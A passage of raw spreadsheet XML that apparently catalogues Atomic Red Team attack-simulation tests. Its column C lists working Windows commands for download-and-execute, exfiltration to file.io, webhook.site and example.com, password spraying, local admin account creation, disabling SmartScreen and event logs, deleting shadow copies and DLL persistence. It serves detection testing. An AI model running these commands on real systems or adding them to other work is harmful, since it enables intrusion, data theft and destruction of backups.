        <v>IEX (New-Object System.Net.WebClient).Downloadstring('https://raw.githubusercontent.com/samratashok/nishang/c75da7f91fcc356f846e09eab0cfd7f296ebf746/Shells/Invoke-PowerShellIcmp.ps1'); Invoke-PowerShellIcmp -IPAddress 127.0.0.1</v>
      </c>
    </row>
    <row r="98" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A98" t="s">
        <v>158</v>
      </c>
      <c r="B98" t="s">
        <v>159</v>
      </c>
      <c r="C98" t="str">
        <f>VLOOKUP(B98,[1]Discovery!A:G,7,FALSE)</f>
        <v>[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };$web = (New-Object System.Net.WebClient);$result = $web.DownloadFile("https://download.sysinternals.com/files/PSTools.zip"</v>
      </c>
    </row>
    <row r="99" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A99" t="s">
        <v>158</v>
      </c>
      <c r="B99" t="s">
        <v>160</v>
      </c>
      <c r="C99" t="str">
        <f>VLOOKUP(B99,[1]Discovery!A:G,7,FALSE)</f>
        <v>(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt') | Out-File LICENSE.txt; Invoke-Item LICENSE.txt</v>
      </c>
    </row>
    <row r="100" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A100" t="s">
        <v>158</v>
      </c>
      <c r="B100" t="s">
        <v>161</v>
      </c>
      <c r="C100" t="str">
        <f>VLOOKUP(B100,[1]Discovery!A:G,7,FALSE)</f>
        <v>C:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o c:\users\public\music\allthethingsx64.dll &amp;&amp; C:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll --output c:\users\public\music\allthethingsx64.dll &amp;&amp; C:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o c:\programdata\allthethingsx64.dll &amp;&amp; C:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o %Temp%\allthethingsx64.dll</v>
      </c>
    </row>
    <row r="101" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A101" t="s">
        <v>162</v>
      </c>
      <c r="B101" t="s">
        <v>163</v>
      </c>
      <c r="C101" t="str">
        <f>VLOOKUP(B101,[1]Discovery!A:G,7,FALSE)</f>
        <v>$plaintext = ([system.Text.Encoding]::UTF8.getBytes("Path\n----\nC:\Users\victim")); $key = "abcdefghijklmnopqrstuvwxyz123456"; $cyphertext =  @(); for ($i = 0; $i -lt $plaintext.Count; $i++) {;  $cyphertext += $plaintext[$i] -bxor $key[$i % $key.Length]; }; $cyphertext = [system.Text.Encoding]::UTF8.getString($cyphertext); [System.Net.ServicePointManager]::Expect100Continue = $false; Invoke-WebRequest -Uri example.com -Method POST -Body $cyphertext -DisableKeepAlive</v>
      </c>
    </row>
    <row r="102" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A102" t="s">
        <v>164</v>
      </c>
      <c r="B102" t="s">
        <v>165</v>
      </c>
      <c r="C102" t="str">
        <f>VLOOKUP(B102,[1]Discovery!A:G,7,FALSE)</f>
        <v>for($i=0; $i -le 1000; $i++) { (Invoke-WebRequest "https://8.8.8.8/resolve?name=atomicredteam.$(Get-Random -Minimum 1 -Maximum 999999).127.0.0.1.xip.io&amp;type=TXT" -UseBasicParsing).Content}</v>
      </c>
    </row>
    <row r="103" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A103" t="s">
        <v>166</v>
      </c>
      <c r="B103" t="s">
        <v>167</v>
      </c>
      <c r="C103" t="str">
        <f>VLOOKUP(B103,[1]Discovery!A:G,7,FALSE)</f>
        <v>$path = resolve-path "c:\ProgramData\Microsoft\Windows Defender\Platform\*\ConfigSecurityPolicy.exe";  $path[0] c:\temp\config.xml "https://webhook.site?d=sensitive-data-here"</v>
      </c>
    </row>
    <row r="104" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A104" t="s">
        <v>168</v>
      </c>
      <c r="B104" t="s">
        <v>169</v>
      </c>
      <c r="C104" t="str">
        <f>VLOOKUP(B104,[1]Discovery!A:G,7,FALSE)</f>
        <v>net.exe stop spooler</v>
      </c>
    </row>
    <row r="105" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A105" t="s">
        <v>168</v>
      </c>
      <c r="B105" t="s">
        <v>170</v>
      </c>
      <c r="C105" t="str">
        <f>VLOOKUP(B105,[1]Discovery!A:G,7,FALSE)</f>
        <v>sc.exe stop spooler</v>
      </c>
    </row>
    <row r="106" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A106" t="s">
        <v>171</v>
      </c>
      <c r="B106" t="s">
        <v>172</v>
      </c>
      <c r="C106" t="str">
        <f>VLOOKUP(B106,[1]Discovery!A:G,7,FALSE)</f>
        <v>$extList = "fcfhplploccackoneaefokcmbjfbkenj"</v>
      </c>
    </row>
    <row r="107" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A107" t="s">
        <v>173</v>
      </c>
      <c r="B107" t="s">
        <v>174</v>
      </c>
      <c r="C107" t="str">
        <f>VLOOKUP(B107,[1]Discovery!A:G,7,FALSE)</f>
        <v>$RemovableDrives=@(); $RemovableDrives = Get-WmiObject -Class Win32_LogicalDisk -filter "drivetype=2" | select-object -expandproperty DeviceID; ForEach ($Drive in $RemovableDrives) { write-host "Removable Drive Found:" $Drive; New-Item -Path $Drive/T1091Test1.txt -ItemType "file" -Force -Value "T1091 Test 1 has created this file to simulate malware spread to removable drives." }</v>
      </c>
    </row>
    <row r="108" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A108" t="s">
        <v>175</v>
      </c>
      <c r="B108" t="s">
        <v>176</v>
      </c>
      <c r="C108" t="str">
        <f>VLOOKUP(B108,[1]Discovery!A:G,7,FALSE)</f>
        <v>net user art-test /add &amp;&amp; net user art-test C0ntr4seNNa &amp;&amp; net localgroup administrators art-test /add</v>
      </c>
    </row>
    <row r="109" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A109" t="s">
        <v>91</v>
      </c>
      <c r="B109" t="s">
        <v>177</v>
      </c>
      <c r="C109" t="str">
        <f>VLOOKUP(B109,[1]Discovery!A:G,7,FALSE)</f>
        <v>powershell.exe -e  JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==</v>
      </c>
    </row>
    <row r="110" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A110" t="s">
        <v>178</v>
      </c>
      <c r="B110" t="s">
        <v>179</v>
      </c>
      <c r="C110" t="str">
        <f>VLOOKUP(B110,[1]Discovery!A:G,7,FALSE)</f>
        <v>$x = Get-Random -Minimum 2 -Maximum 9999; $y = Get-Random -Minimum 2 -Maximum 9999; $z = Get-Random -Minimum 2 -Maximum 9999; $w = Get-Random -Minimum 2 -Maximum 9999; Write-Host HaHa_$x$y$z; $fmm = Get-LocalGroupMember -Group Administrators |?{ $_.ObjectClass -match "User" -and $_.PrincipalSource -match "Local"} | Select Name; foreach($member in $fmm) {;     if($member -like "*Administrator*") {;         $account = $member.Name -replace ".+\\\"</v>
      </c>
    </row>
    <row r="111" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A111" t="s">
        <v>180</v>
      </c>
      <c r="B111" t="s">
        <v>181</v>
      </c>
      <c r="C111" t="str">
        <f>VLOOKUP(B111,[1]Discovery!A:G,7,FALSE)</f>
        <v>%temp%\uacme\33 Akagi64.exe</v>
      </c>
    </row>
    <row r="112" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A112" t="s">
        <v>182</v>
      </c>
      <c r="B112" t="s">
        <v>183</v>
      </c>
      <c r="C112" t="str">
        <f>VLOOKUP(B112,[1]Discovery!A:G,7,FALSE)</f>
        <v>reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeDC /t REG_DWORD /d 0 /f &amp;&amp; reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeOffsetDC /t REG_DWORD /d 0 /f &amp;&amp; reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTime /t REG_DWORD /d 0 /f &amp;&amp; reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeOffset /t REG_DWORD /d 0 /f &amp;&amp; reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v EnableSmartScreen /t REG_DWORD /d 0 /f &amp;&amp; reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v ShellSmartScreenLevel /t REG_SZ /d Block /f</v>
      </c>
    </row>
    <row r="113" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A113" t="s">
        <v>184</v>
      </c>
      <c r="B113" t="s">
        <v>185</v>
      </c>
      <c r="C113" t="str">
        <f>VLOOKUP(B113,[1]Discovery!A:G,7,FALSE)</f>
        <v>Test-NetConnection -ComputerName google.com -port 8081</v>
      </c>
    </row>
    <row r="114" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A114" t="s">
        <v>186</v>
      </c>
      <c r="B114" t="s">
        <v>187</v>
      </c>
      <c r="C114" t="str">
        <f>VLOOKUP(B114,[1]Discovery!A:G,7,FALSE)</f>
        <v>$fileName = "C:\temp\T1020_exfilFile.txt"; $url = "https://google.com"; $file = New-Item -Force $fileName -Value "This is ART IcedID Botnet Exfil Test"; $contentType = "application/octet-stream"; try {Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName} catch{}</v>
      </c>
    </row>
    <row r="115" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A115" t="s">
        <v>188</v>
      </c>
      <c r="B115" t="s">
        <v>189</v>
      </c>
      <c r="C115" t="str">
        <f>VLOOKUP(B115,[1]Discovery!A:G,7,FALSE)</f>
        <v>C:\Windows\System32\Curl.exe -F 'file=@3945c9_artifact' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/</v>
      </c>
    </row>
    <row r="116" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A116" t="s">
        <v>190</v>
      </c>
      <c r="B116" t="s">
        <v>191</v>
      </c>
      <c r="C116" t="str">
        <f>VLOOKUP(B116,[1]Discovery!A:G,7,FALSE)</f>
        <v>if (-not (Test-Path $env:TEMP\T1485.txt)) { New-Item $env:TEMP\T1485.txt -Force }; Invoke-Expression -Command "$env:TEMP\Sdelete\sdelete.exe -accepteula $env:TEMP\T1485.txt"</v>
      </c>
    </row>
    <row r="117" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A117" t="s">
        <v>192</v>
      </c>
      <c r="B117" t="s">
        <v>193</v>
      </c>
      <c r="C117" t="str">
        <f>VLOOKUP(B117,[1]Discovery!A:G,7,FALSE)</f>
        <v>Invoke-WebRequest http://amtso.eicar.org/PotentiallyUnwanted.exe -OutFile $env:TEMP/PotentiallyUnwanted.exe; &amp; "$env:TEMP/PotentiallyUnwanted.exe"</v>
      </c>
    </row>
    <row r="118" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A118" t="s">
        <v>192</v>
      </c>
      <c r="B118" t="s">
        <v>194</v>
      </c>
      <c r="C118" t="str">
        <f>VLOOKUP(B118,[1]Discovery!A:G,7,FALSE)</f>
        <v>$fname = "$env:TEMP\atomic_redteam_x4m_exec.vbs"; $fname1 = "$env:TEMP\procexp.exe"; if (Test-Path $fname) {;   Remove-Item $fname;   Remove-Item $fname1; }; $xlApp = New-Object -COMObject "Excel.Application"; $xlApp.Visible = $True; $xlApp.DisplayAlerts = $False; $xlBook = $xlApp.Workbooks.Add(); $sheet = $xlBook.Excel4MacroSheets.Add(); if ("$env:Username" -ne "") {;   $sheet.Cells.Item(1</v>
      </c>
    </row>
    <row r="119" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A119" t="s">
        <v>195</v>
      </c>
      <c r="B119" t="s">
        <v>196</v>
      </c>
      <c r="C119" t="str">
        <f>VLOOKUP(B119,[1]Discovery!A:G,7,FALSE)</f>
        <v>$url = 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1566.001/bin/PhishingAttachment.xlsm'; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri $url -OutFile $env:TEMP\PhishingAttachment.xlsm</v>
      </c>
    </row>
    <row r="120" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A120" t="s">
        <v>197</v>
      </c>
      <c r="B120" t="s">
        <v>198</v>
      </c>
      <c r="C120" t="str">
        <f>VLOOKUP(B120,[1]Discovery!A:G,7,FALSE)</f>
        <v>wevtutil sl "Microsoft-Windows-IKE/Operational" /e:false</v>
      </c>
    </row>
    <row r="121" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A121" t="s">
        <v>199</v>
      </c>
      <c r="B121" t="s">
        <v>200</v>
      </c>
      <c r="C121" t="str">
        <f>VLOOKUP(B121,[1]Discovery!A:G,7,FALSE)</f>
        <v>net stop w32time; Copy-Item d97818_AtomicTest.dll C:\Users\Public\AtomicTest.dll; reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_SZ /v "DllName" /d "C:\Users\Public\AtomicTest.dll" /f; reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "Enabled" /d "1" /f; reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "InputProvider" /d "1" /f; net start w32time</v>
      </c>
    </row>
    <row r="122" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A122" t="s">
        <v>113</v>
      </c>
      <c r="B122" t="s">
        <v>201</v>
      </c>
      <c r="C122" t="str">
        <f>VLOOKUP(B122,[1]Discovery!A:G,7,FALSE)</f>
        <v>reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideClock /t REG_DWORD /d 1 /f</v>
      </c>
    </row>
    <row r="123" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A123" t="s">
        <v>202</v>
      </c>
      <c r="B123" t="s">
        <v>203</v>
      </c>
      <c r="C123" t="str">
        <f>VLOOKUP(B123,[1]Discovery!A:G,7,FALSE)</f>
        <v>mkdir %temp%\T1222.001_attrib;echo T1222.001_attrib1 &gt;&gt; %temp%\T1222.001_attrib\T1222.001_attrib1.txt;echo T1222.001_attrib2 &gt;&gt; %temp%\T1222.001_attrib\T1222.001_attrib2.txt;attrib.exe +r %temp%\T1222.001_attrib\T1222.001_attrib1.txt;attrib.exe +r %temp%\T1222.001_attrib\T1222.001_attrib2.txt;attrib.exe -r %temp%\T1222.001_attrib\*.* /s</v>
      </c>
    </row>
    <row r="124" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A124" t="s">
        <v>202</v>
      </c>
      <c r="B124" t="s">
        <v>204</v>
      </c>
      <c r="C124" t="str">
        <f>VLOOKUP(B124,[1]Discovery!A:G,7,FALSE)</f>
        <v>mkdir %temp%\T1222.001_attrib_2 &gt;nul 2&gt;&amp;1 &amp;&amp; echo T1222.001_attrib1 &gt;&gt; %temp%\T1222.001_attrib_2\T1222.001_attrib1.txt &amp;&amp; echo T1222.001_attrib2 &gt;&gt; %temp%\T1222.001_attrib_2\T1222.001_attrib2.txt &amp;&amp; attrib.exe +h %temp%\T1222.001_attrib_2\T1222.001_attrib1.txt &amp;&amp; attrib.exe +h %temp%\T1222.001_attrib_2\T1222.001_attrib2.txt</v>
      </c>
    </row>
    <row r="125" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A125" t="s">
        <v>205</v>
      </c>
      <c r="B125" t="s">
        <v>206</v>
      </c>
      <c r="C125" t="str">
        <f>VLOOKUP(B125,[1]Discovery!A:G,7,FALSE)</f>
        <v>$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'; iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1'); domainpassspray -consoleoutput -noninteractive -emptypasswords</v>
      </c>
    </row>
    <row r="126" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A126" t="s">
        <v>207</v>
      </c>
      <c r="B126" t="s">
        <v>208</v>
      </c>
      <c r="C126" t="str">
        <f>VLOOKUP(B126,[1]Discovery!A:G,7,FALSE)</f>
        <v>if(-not (Test-Path $env:TEMP\LineNumbers.txt)){ ;   1..100 | ForEach-Object { Add-Content -Path $env:TEMP\LineNumbers.txt -Value "This is line $_." }; }; [System.Net.ServicePointManager]::Expect100Continue = $false; $filecontent = Get-Content -Path $env:TEMP\LineNumbers.txt; Invoke-WebRequest -Uri example.com -Method POST -Body $filecontent -DisableKeepAlive</v>
      </c>
    </row>
    <row r="127" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A127" t="s">
        <v>209</v>
      </c>
      <c r="B127" t="s">
        <v>210</v>
      </c>
      <c r="C127" t="str">
        <f>VLOOKUP(B127,[1]Discovery!A:G,7,FALSE)</f>
        <v>Set-Content -Path 'message.txt' -Value 'proof that this machine was hacked.'</v>
      </c>
    </row>
    <row r="128" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A128" t="s">
        <v>211</v>
      </c>
      <c r="B128" t="s">
        <v>212</v>
      </c>
      <c r="C128" t="str">
        <f>VLOOKUP(B128,[1]Discovery!A:G,7,FALSE)</f>
        <v>wmic.exe shadowcopy delete</v>
      </c>
    </row>
    <row r="129" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A129" t="s">
        <v>182</v>
      </c>
      <c r="B129" t="s">
        <v>219</v>
      </c>
      <c r="C129" t="s">
        <v>220</v>
      </c>
    </row>
    <row r="130" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A130" t="s">
        <v>221</v>
      </c>
      <c r="B130" t="s">
        <v>231</v>
      </c>
      <c r="C130" t="s">
        <v>232</v>
      </c>
    </row>
    <row r="131" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A131" t="s">
        <v>222</v>
      </c>
      <c r="B131" t="s">
        <v>234</v>
      </c>
      <c r="C131" t="s">
        <v>235</v>
      </c>
    </row>
    <row r="132" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A132" t="s">
        <v>236</v>
      </c>
      <c r="B132" t="s">
        <v>238</v>
      </c>
      <c r="C132" t="s">
        <v>237</v>
      </c>
    </row>
    <row r="133" spans="1:3" ht="29" x14ac:dyDescent="0.35">
      <c r="A133" t="s">
        <v>256</v>
      </c>
      <c r="B133" t="s">
        <v>259</v>
      </c>
      <c r="C133" s="1" t="s">
        <v>258</v>
      </c>
    </row>
    <row r="134" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A134" t="s">
        <v>211</v>
      </c>
      <c r="B134" t="s">
        <v>262</v>
      </c>
      <c r="C134" t="s">
        <v>263</v>
      </c>
    </row>
    <row r="135" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A135" t="s">
        <v>211</v>
      </c>
      <c r="B135" t="s">
        <v>260</v>
      </c>
      <c r="C135" t="s">
        <v>261</v>
      </c>
    </row>
    <row r="136" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A136" t="s">
        <v>113</v>
      </c>
      <c r="B136" t="s">
        <v>268</v>
      </c>
      <c r="C136" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="137" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A137" t="s">
        <v>113</v>
      </c>
      <c r="B137" t="s">
        <v>270</v>
      </c>
      <c r="C137" t="s">
        <v>271</v>
      </c>
    </row>
    <row r="138" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A138" t="s">
        <v>113</v>
      </c>
      <c r="B138" t="s">
        <v>272</v>
      </c>
      <c r="C138" t="s">
        <v>273</v>
      </c>
    </row>
    <row r="139" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A139" t="s">
        <v>265</v>
      </c>
      <c r="B139" t="s">
        <v>274</v>
      </c>
      <c r="C139" t="s">
        <v>275</v>
      </c>
    </row>
    <row r="140" spans="1:3" ht="29" x14ac:dyDescent="0.35">
      <c r="A140" t="s">
        <v>265</v>
      </c>
      <c r="B140" t="s">
        <v>276</v>
      </c>
      <c r="C140" s="1" t="s">
        <v>277</v>
      </c>
    </row>
    <row r="141" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A141" t="s">
        <v>265</v>
      </c>
      <c r="B141" t="s">
        <v>278</v>
      </c>
      <c r="C141" t="s">
        <v>279</v>
      </c>
    </row>
    <row r="142" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A142" t="s">
        <v>266</v>
      </c>
      <c r="B142" t="s">
        <v>280</v>
      </c>
      <c r="C142" t="s">
        <v>281</v>
      </c>
    </row>
    <row r="143" spans="1:3" ht="43.5" x14ac:dyDescent="0.35">
      <c r="A143" t="s">
        <v>285</v>
      </c>
      <c r="B143" t="s">
        <v>286</v>
      </c>
      <c r="C143" s="1" t="s">
        <v>287</v>
      </c>
    </row>
    <row r="144" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A144" t="s">
        <v>293</v>
      </c>
      <c r="B144" t="s">
        <v>294</v>
      </c>
      <c r="C144" t="s">
        <v>295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A151B9-539B-4098-A430-6888A398E7C3}">
  <dimension ref="A1:F106"/>
  <sheetViews>
    <sheetView tabSelected="1" topLeftCell="A16" workbookViewId="0">
      <selection activeCell="D30" sqref="D30"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="14.5" x14ac:dyDescent="0.35"/>
  <cols>
    <col min="2" max="2" width="9.36328125" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="37.08984375" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="49.08984375" customWidth="1"/>
    <col min="5" max="5" width="7.6328125" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="37.81640625" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1" t="s">
        <v>282</v>
      </c>
      <c r="C1" t="s">
        <v>283</v>
      </c>
      <c r="D1" t="s">
        <v>284</v>
      </c>
      <c r="E1" t="s">
        <v>309</v>
      </c>
      <c r="F1" t="s">
        <v>310</v>
      </c>
    </row>
    <row r="2" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2" t="s">
        <v>95</v>
      </c>
      <c r="B2" t="s">
        <v>95</v>
      </c>
      <c r="C2" t="s">
        <v>96</v>
      </c>
      <c r="D2" t="s">
        <v>213</v>
      </c>
      <c r="E2" t="s">
        <v>306</v>
      </c>
      <c r="F2" t="s">
        <v>314</v>
      </c>
    </row>
    <row r="3" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3" t="s">
        <v>97</v>
      </c>
      <c r="B3" t="s">
        <v>97</v>
      </c>
      <c r="C3" t="s">
        <v>98</v>
      </c>
      <c r="D3" t="s">
        <v>214</v>
      </c>
      <c r="E3" t="s">
        <v>306</v>
      </c>
      <c r="F3" t="s">
        <v>315</v>
      </c>
    </row>
    <row r="4" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A4" t="s">
        <v>113</v>
      </c>
      <c r="B4" t="s">
        <v>113</v>
      </c>
      <c r="C4" t="s">
        <v>114</v>
      </c>
      <c r="D4" t="s">
        <v>215</v>
      </c>
      <c r="E4" t="s">
        <v>306</v>
      </c>
      <c r="F4" t="s">
        <v>316</v>
      </c>
    </row>
    <row r="5" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A5" t="s">
        <v>178</v>
      </c>
      <c r="B5" t="s">
        <v>178</v>
      </c>
      <c r="C5" t="s">
        <v>179</v>
      </c>
      <c r="D5" t="s">
        <v>255</v>
      </c>
      <c r="E5" t="s">
        <v>305</v>
      </c>
      <c r="F5" t="s">
        <v>317</v>
      </c>
    </row>
    <row r="6" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A6" t="s">
        <v>182</v>
      </c>
      <c r="B6" t="s">
        <v>182</v>
      </c>
      <c r="C6" t="s">
        <v>183</v>
      </c>
      <c r="D6" t="s">
        <v>216</v>
      </c>
      <c r="E6" t="s">
        <v>306</v>
      </c>
      <c r="F6" t="s">
        <v>318</v>
      </c>
    </row>
    <row r="7" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A7" t="s">
        <v>168</v>
      </c>
      <c r="B7" t="s">
        <v>168</v>
      </c>
      <c r="C7" t="s">
        <v>169</v>
      </c>
      <c r="D7" t="s">
        <v>217</v>
      </c>
      <c r="E7" t="s">
        <v>306</v>
      </c>
      <c r="F7" t="s">
        <v>319</v>
      </c>
    </row>
    <row r="8" spans="1:6" x14ac:dyDescent="0.35">
      <c r="B8" t="s">
        <v>168</v>
      </c>
      <c r="C8" t="s">
        <v>170</v>
      </c>
      <c r="D8" t="s">
        <v>218</v>
      </c>
      <c r="E8" t="s">
        <v>306</v>
      </c>
      <c r="F8" t="s">
        <v>320</v>
      </c>
    </row>
    <row r="9" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A9" t="s">
        <v>182</v>
      </c>
      <c r="B9" t="s">
        <v>182</v>
      </c>
      <c r="C9" t="s">
        <v>219</v>
      </c>
      <c r="D9" t="s">
        <v>220</v>
      </c>
      <c r="E9" t="s">
        <v>305</v>
      </c>
      <c r="F9" t="s">
        <v>321</v>
      </c>
    </row>
    <row r="10" spans="1:6" s="2" customFormat="1" x14ac:dyDescent="0.35"/>
    <row r="11" spans="1:6" s="2" customFormat="1" x14ac:dyDescent="0.35"/>
    <row r="12" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A12" t="s">
        <v>192</v>
      </c>
      <c r="B12" t="s">
        <v>192</v>
      </c>
      <c r="C12" t="s">
        <v>193</v>
      </c>
      <c r="D12" t="s">
        <v>223</v>
      </c>
      <c r="E12" t="s">
        <v>305</v>
      </c>
      <c r="F12" t="s">
        <v>322</v>
      </c>
    </row>
    <row r="13" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A13" t="s">
        <v>151</v>
      </c>
      <c r="B13" t="s">
        <v>151</v>
      </c>
      <c r="C13" t="s">
        <v>152</v>
      </c>
      <c r="D13" t="s">
        <v>224</v>
      </c>
      <c r="E13" t="s">
        <v>306</v>
      </c>
    </row>
    <row r="14" spans="1:6" x14ac:dyDescent="0.35">
      <c r="B14" t="s">
        <v>151</v>
      </c>
      <c r="C14" t="s">
        <v>153</v>
      </c>
      <c r="D14" t="s">
        <v>225</v>
      </c>
      <c r="E14" t="s">
        <v>305</v>
      </c>
    </row>
    <row r="15" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A15" t="s">
        <v>192</v>
      </c>
      <c r="B15" t="s">
        <v>192</v>
      </c>
      <c r="C15" t="s">
        <v>194</v>
      </c>
      <c r="D15" t="s">
        <v>307</v>
      </c>
      <c r="E15" t="s">
        <v>305</v>
      </c>
      <c r="F15" t="s">
        <v>323</v>
      </c>
    </row>
    <row r="16" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A16" t="s">
        <v>173</v>
      </c>
      <c r="B16" t="s">
        <v>173</v>
      </c>
      <c r="C16" t="s">
        <v>174</v>
      </c>
      <c r="D16" s="3" t="s">
        <v>226</v>
      </c>
      <c r="E16" t="s">
        <v>305</v>
      </c>
      <c r="F16" t="s">
        <v>324</v>
      </c>
    </row>
    <row r="17" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A17" t="s">
        <v>195</v>
      </c>
      <c r="B17" t="s">
        <v>195</v>
      </c>
      <c r="C17" t="s">
        <v>196</v>
      </c>
      <c r="D17" t="s">
        <v>227</v>
      </c>
      <c r="E17" t="s">
        <v>305</v>
      </c>
      <c r="F17" t="s">
        <v>325</v>
      </c>
    </row>
    <row r="18" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A18" t="s">
        <v>87</v>
      </c>
      <c r="B18" t="s">
        <v>87</v>
      </c>
      <c r="C18" t="s">
        <v>88</v>
      </c>
      <c r="D18" t="s">
        <v>308</v>
      </c>
      <c r="E18" t="s">
        <v>306</v>
      </c>
    </row>
    <row r="19" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A19" t="s">
        <v>197</v>
      </c>
      <c r="B19" t="s">
        <v>197</v>
      </c>
      <c r="C19" t="s">
        <v>198</v>
      </c>
      <c r="D19" t="s">
        <v>228</v>
      </c>
      <c r="E19" t="s">
        <v>306</v>
      </c>
      <c r="F19" t="s">
        <v>326</v>
      </c>
    </row>
    <row r="20" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A20" t="s">
        <v>115</v>
      </c>
      <c r="B20" t="s">
        <v>115</v>
      </c>
      <c r="C20" t="s">
        <v>116</v>
      </c>
      <c r="D20" t="s">
        <v>229</v>
      </c>
      <c r="E20" t="s">
        <v>306</v>
      </c>
      <c r="F20" t="s">
        <v>327</v>
      </c>
    </row>
